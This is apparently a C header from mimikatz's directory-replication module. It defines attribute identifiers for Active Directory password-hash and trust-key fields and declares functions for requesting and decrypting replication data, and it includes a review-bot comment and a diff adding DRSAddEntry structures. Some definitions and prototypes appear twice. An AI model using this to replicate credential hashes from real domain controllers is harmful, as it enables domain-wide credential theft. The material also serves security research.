#define szOID_ANSI_sAMAccountName "1.2.840.113556.1.4.221"
#define szOID_ANSI_userPrincipalName "1.2.840.113556.1.4.656"
#define szOID_ANSI_servicePrincipalName "1.2.840.113556.1.4.771"
#define szOID_ANSI_sAMAccountType "1.2.840.113556.1.4.302"
#define szOID_ANSI_userAccountControl "1.2.840.113556.1.4.8"
#define szOID_ANSI_accountExpires "1.2.840.113556.1.4.159"
#define szOID_ANSI_pwdLastSet "1.2.840.113556.1.4.96"
#define szOID_ANSI_objectSid "1.2.840.113556.1.4.146"
#define szOID_ANSI_sIDHistory "1.2.840.113556.1.4.609"
#define szOID_ANSI_unicodePwd "1.2.840.113556.1.4.90"
#define szOID_ANSI_ntPwdHistory "1.2.840.113556.1.4.94"
#define szOID_ANSI_dBCSPwd "1.2.840.113556.1.4.55"
#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
#define ATT_UNICODE_PWD 589914
#define ATT_NT_PWD_HISTORY 589918
#define ATT_DBCS_PWD 589879
#define ATT_LM_PWD_HISTORY 589984
#define ATT_SUPPLEMENTAL_CREDENTIALS 589949
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"
#define ATT_CURRENT_VALUE 589851
#define szOID_ANSI_currentValue "1.2.840.113556.1.4.27"
#define ATT_TRUST_ATTRIBUTES 590294
#define ATT_TRUST_AUTH_INCOMING 589953
#define ATT_TRUST_AUTH_OUTGOING 589959
#define ATT_TRUST_DIRECTION 589956
#define ATT_TRUST_PARENT 590295
#define ATT_TRUST_PARTNER 589957
#define ATT_TRUST_TYPE 589960
#define ATT_WHEN_CREATED MAKELONG( 2, 2)
#define ATT_WHEN_CHANGED MAKELONG( 3, 2)
#define ATT_RDN MAKELONG( 1, 9)
#define ATT_OBJECT_SID MAKELONG(146, 9)
#define ATT_SAM_ACCOUNT_NAME MAKELONG(221, 9)
#define ATT_USER_PRINCIPAL_NAME MAKELONG(656, 9)
#define ATT_SERVICE_PRINCIPAL_NAME MAKELONG(771, 9)
#define ATT_SID_HISTORY MAKELONG(609, 9)
#define ATT_USER_ACCOUNT_CONTROL MAKELONG( 8, 9)
#define ATT_SAM_ACCOUNT_TYPE MAKELONG(302, 9)
#define ATT_LOGON_HOURS MAKELONG( 64, 9)
#define ATT_LOGON_WORKSTATION MAKELONG( 65, 9)
#define ATT_LAST_LOGON MAKELONG( 52, 9)
#define ATT_PWD_LAST_SET MAKELONG( 96, 9)
#define ATT_ACCOUNT_EXPIRES MAKELONG(159, 9)
#define ATT_LOCKOUT_TIME MAKELONG(662, 9)
#define ATT_UNICODE_PWD MAKELONG( 90, 9)
#define ATT_NT_PWD_HISTORY MAKELONG( 94, 9)
#define ATT_DBCS_PWD MAKELONG( 55, 9)
#define ATT_LM_PWD_HISTORY MAKELONG(160, 9)
#define ATT_SUPPLEMENTAL_CREDENTIALS MAKELONG(125, 9)
#define ATT_CURRENT_VALUE MAKELONG( 27, 9)
#define ATT_TRUST_ATTRIBUTES MAKELONG(470, 9)
#define ATT_TRUST_AUTH_INCOMING MAKELONG(129, 9)
#define ATT_TRUST_AUTH_OUTGOING MAKELONG(135, 9)
#define ATT_TRUST_DIRECTION MAKELONG(132, 9)
#define ATT_TRUST_PARENT MAKELONG(471, 9)
#define ATT_TRUST_PARTNER MAKELONG(133, 9)
#define ATT_TRUST_TYPE MAKELONG(136, 9)
void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context);
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(SCHEMA_PREFIX_TABLE *prefixTable, REPLENTINFLIST *objects);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val);
void kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(DWORD dcOutVersion, DRS_MSG_DCINFOREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(DWORD nameCrackOutVersion, DRS_MSG_CRACKREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply);
void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTable);
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);
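Review bot: The `ATT_*` macros written as `MAKELONG(n, 9)` and `MAKELONG(n, 2)` have no comment explaining what the two words mean or when the values are valid. Going by `kull_m_rpc_drsr_MakeAttid`, the high word is the prefix-table `ndx` and the low word derives from the last OID arc, so these constants only match a reply whose prefix table assigns that same index to the prefix. I would add a comment above the block such as `/* ATTRTYP = MAKELONG(last arc, prefix ndx); ndx values presumably assume the default prefix table, prefer szOID_ANSI_* with kull_m_rpc_drsr_MakeAttid() */`. That would steer later code away from comparing these constants directly against `attrTyp` values from a reply.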


@ -458,8 +458,215 @@ typedef union _DRS_MSG_DCINFOREPLY {
DRS_MSG_DCINFOREPLY_VFFFFFFFF VFFFFFFFF;
} DRS_MSG_DCINFOREPLY;
typedef /* [public][public][public][public][public] */ struct __MIDL_drsuapi_0031
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
ATTRTYP type;
BOOL valReturned;
ATTRVAL Val;
} INTFORMPROB_DRS_WIRE_V1;
typedef struct _PROBLEMLIST_DRS_WIRE_V1
{
struct _PROBLEMLIST_DRS_WIRE_V1 *pNextProblem;
INTFORMPROB_DRS_WIRE_V1 intprob;
} PROBLEMLIST_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0032
{
DSNAME *pObject;
ULONG count;
PROBLEMLIST_DRS_WIRE_V1 FirstProblem;
} ATRERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0033
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
DSNAME *pMatched;
} NAMERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public] */ struct __MIDL_drsuapi_0034
{
UCHAR nameRes;
UCHAR unusedPad;
USHORT nextRDN;
} NAMERESOP_DRS_WIRE_V1;
typedef struct _DSA_ADDRESS_LIST_DRS_WIRE_V1
{
struct _DSA_ADDRESS_LIST_DRS_WIRE_V1 *pNextAddress;
RPC_UNICODE_STRING *pAddress;
} DSA_ADDRESS_LIST_DRS_WIRE_V1;
typedef struct CONTREF_DRS_WIRE_V1
{
DSNAME *pTarget;
NAMERESOP_DRS_WIRE_V1 OpState;
USHORT aliasRDN;
USHORT RDNsInternal;
USHORT refType;
USHORT count;
DSA_ADDRESS_LIST_DRS_WIRE_V1 *pDAL;
struct CONTREF_DRS_WIRE_V1 *pNextContRef;
BOOL bNewChoice;
UCHAR choice;
} CONTREF_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0035
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
CONTREF_DRS_WIRE_V1 Refer;
} REFERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0036
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} SECERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0037
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} SVCERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0038
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} UPDERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0039
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} SYSERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][switch_type] */ union __MIDL_drsuapi_0040
{
ATRERR_DRS_WIRE_V1 AtrErr;
NAMERR_DRS_WIRE_V1 NamErr;
REFERR_DRS_WIRE_V1 RefErr;
SECERR_DRS_WIRE_V1 SecErr;
SVCERR_DRS_WIRE_V1 SvcErr;
UPDERR_DRS_WIRE_V1 UpdErr;
SYSERR_DRS_WIRE_V1 SysErr;
} DIRERR_DRS_WIRE_V1;
typedef /* [public][public][public][public] */ struct __MIDL_drsuapi_0099
{
unsigned long cbBuffer;
unsigned long BufferType;
BYTE *pvBuffer;
} DRS_SecBuffer;
typedef /* [public][public][public][public][public][public][public] */ struct __MIDL_drsuapi_0100
{
unsigned long ulVersion;
unsigned long cBuffers;
DRS_SecBuffer *Buffers;
} DRS_SecBufferDesc;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0134
{
DSNAME *pObject;
ATTRBLOCK AttrBlock;
} DRS_MSG_ADDENTRYREQ_V1;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0135
{
ENTINFLIST EntInfList;
} DRS_MSG_ADDENTRYREQ_V2;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0136
{
ENTINFLIST EntInfList;
DRS_SecBufferDesc *pClientCreds;
} DRS_MSG_ADDENTRYREQ_V3;
typedef /* [public][public][switch_type] */ union __MIDL_drsuapi_0137
{
DRS_MSG_ADDENTRYREQ_V1 V1;
DRS_MSG_ADDENTRYREQ_V2 V2;
DRS_MSG_ADDENTRYREQ_V3 V3;
} DRS_MSG_ADDENTRYREQ;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0138
{
GUID Guid;
NT4SID Sid;
DWORD errCode;
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} DRS_MSG_ADDENTRYREPLY_V1;
typedef /* [public][public][public][public][public][public][public] */ struct __MIDL_drsuapi_0139
{
GUID objGuid;
NT4SID objSid;
} ADDENTRY_REPLY_INFO;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0140
{
DSNAME *pErrorObject;
DWORD errCode;
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
ULONG cObjectsAdded;
ADDENTRY_REPLY_INFO *infoList;
} DRS_MSG_ADDENTRYREPLY_V2;
typedef /* [public][public][public][public][public] */ struct __MIDL_drsuapi_0141
{
DWORD dwRepError;
DWORD errCode;
DIRERR_DRS_WIRE_V1 *pErrInfo;
} DRS_ERROR_DATA_V1;
typedef /* [public][public][public][public][switch_type] */ union __MIDL_drsuapi_0142
{
DRS_ERROR_DATA_V1 V1;
} DRS_ERROR_DATA;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0143
{
DSNAME *pdsErrObject;
DWORD dwErrVer;
DRS_ERROR_DATA *pErrData;
ULONG cObjectsAdded;
ADDENTRY_REPLY_INFO *infoList;
} DRS_MSG_ADDENTRYREPLY_V3;
typedef /* [public][public][switch_type] */ union __MIDL_drsuapi_0144
{
DRS_MSG_ADDENTRYREPLY_V1 V1;
DRS_MSG_ADDENTRYREPLY_V2 V2;
DRS_MSG_ADDENTRYREPLY_V3 V3;
} DRS_MSG_ADDENTRYREPLY;
ULONG IDL_DRSBind(handle_t rpc_handle, UUID *puuidClientDsa, DRS_EXTENSIONS *pextClient, DRS_EXTENSIONS **ppextServer, DRS_HANDLE *phDrs);
ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs);
ULONG IDL_DRSGetNCChanges(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_GETCHGREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_GETCHGREPLY *pmsgOut);
ULONG IDL_DRSCrackNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_CRACKREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_CRACKREPLY *pmsgOut);
ULONG IDL_DRSDomainControllerInfo(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_DCINFOREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_DCINFOREPLY *pmsgOut);
ULONG IDL_DRSDomainControllerInfo(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_DCINFOREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_DCINFOREPLY *pmsgOut);
ULONG IDL_DRSAddEntry(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_ADDENTRYREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_ADDENTRYREPLY *pmsgOut);
